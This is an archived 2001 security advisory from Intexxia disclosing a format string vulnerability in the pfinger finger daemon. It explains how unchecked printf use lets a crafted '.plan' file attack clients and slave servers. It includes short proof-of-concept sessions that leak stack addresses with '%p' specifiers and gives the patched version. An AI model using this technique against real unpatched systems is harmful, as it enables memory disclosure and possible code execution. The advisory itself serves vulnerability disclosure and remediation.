OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Benoît Roussel (benoit.rousselintexxia.com)
Date: Thu Dec 20 2001 - 12:39:52 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    ________________________________________________________________________
    SECURITY ADVISORY INTEXXIA(c)
    18 12 2001 ID #1050-181201
    ________________________________________________________________________
    TITLE : pfinger Format String Vulnerability
    CREDITS : Guillaume Pelat / INTEXXIA
    ________________________________________________________________________

    SYSTEM AFFECTED
    ===============

            pfinger <= 0.7.7

    ________________________________________________________________________

    DESCRIPTION
    ===========

            pfinger is a finger daemon written in C. It is vulnerable to a
    format string vulnerability.

    ________________________________________________________________________

    DETAILS
    =======

            Both client and server are vulnerable to a format string
    injection using for example a '.plan' file.

            Client side : the client uses directly the data received from
    the server as the first argument of the printf(3) function. A user could
    create a specially crafted '.plan' file that would be printed by the
    pfinger client. As a result, it could be possible to make execute
    arbitrary code by the client.

            Server side : if the server is configured to connect to a master
    server (with the <sitehost> directive), data received from the master
    server are directly used as first argument in the printf(3) function. If
    a malicious user modifies the master to make it send crafted data, it is
    possible to make execute code to the vulnerable 'slave' server.

    If a user has an account on the master server, he can create a crafted
    '.plan' file containing the format string. A simple request to the
    'client' server would also exploit the server side vulnerability.

            The pfinger daemon is launched with 'nobody' permissions by
    default. Complete exploitation of this vulnerability will permit an
    attacker to execute code with the 'nobody' permissions. But this flaw
    could be used to compromize the local system by exploiting other local
    vulnerabilities.

    ________________________________________________________________________

    PROOF OF CONCEPT
    ================

            Here are two proofs of concept for the both sides.

    Client side :

    eviltest:~$ cat ~/.plan
    Now a little format string: %p %p %p :-)
    eviltest:~$

    goodtest:~$ finger -l evil
    Login Name: evil In real life: Evil
    Login Name Status Login time Host
    evil Evil active Mon 08:02 test
    No mail.
    Plan:
    Now a little format string: 0x8049da0 0x640 0x400a252d :-)
    goodtest:~$

    Server side :

    goodtest:~$ cat /etc/fingerconf
    <fingerconf>
    <sitehost>master</sitehost>
    </fingerconf>

    evilmaster:~$ cat ~/.plan
    Now a little format string: %p %p %p :-)
    evilmaster:~$ telnet test 79
    Trying x.x.x.x...
    Connected to test.lab.intexxia.com.
    Escape character is '^]'.
    /W evil
    Login Name: evil In real life: Evil
    Login Name Status Login time Host
    evil Evil active Mon 08:02 master
    No mail.
    Plan:
    Now a little format string: 0xbfbff860 0x400 0x0 :-)
    Connection closed by foreign host.
    evilmaster:~$

    ________________________________________________________________________

    SOLUTION
    ========

            There is an official solution now. A new version has been
    released which corrects this security issue. pfinger version 0.7.8 is
    available at :

    http://www.xelia.ch/unix/pfinger/

    ________________________________________________________________________

    VENDOR STATUS
    =============

            18-12-2001 : This bulletin was sent to Michael Baumer.
            19-12-2001 : pfinger version 0.7.8 has been released which
                         solves this issue.

    ________________________________________________________________________

    LEGALS
    ======

            Intexxia provides this information as a public service and "as
    is". Intexxia will not be held accountable for any damage or distress
    caused by the proper or improper usage of these materials.

            (c) intexxia 2001. This document is property of intexxia. Feel
    free to use and distribute this material as long as credit is given to
    intexxia and the author.

    ________________________________________________________________________

    CONTACT
    =======

    CERT intexxia certintexxia.com
    INTEXXIA http://www.intexxia.com
    171, av. Georges Clemenceau Standard : +33 1 55 69 49 10
    92024 Nanterre Cedex - France Fax : +33 1 55 69 78 80

    -----BEGIN PGP SIGNATURE-----
    Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

    iQA/AwUBPCIwdU2N8BNyNDXLEQI+MQCg9SuwuxrM3kaQVNT57trzLaPpTJQAn35u
    AhSwVUKGRGPoRmxqMcN1Ue/3
    =OctC
    -----END PGP SIGNATURE-----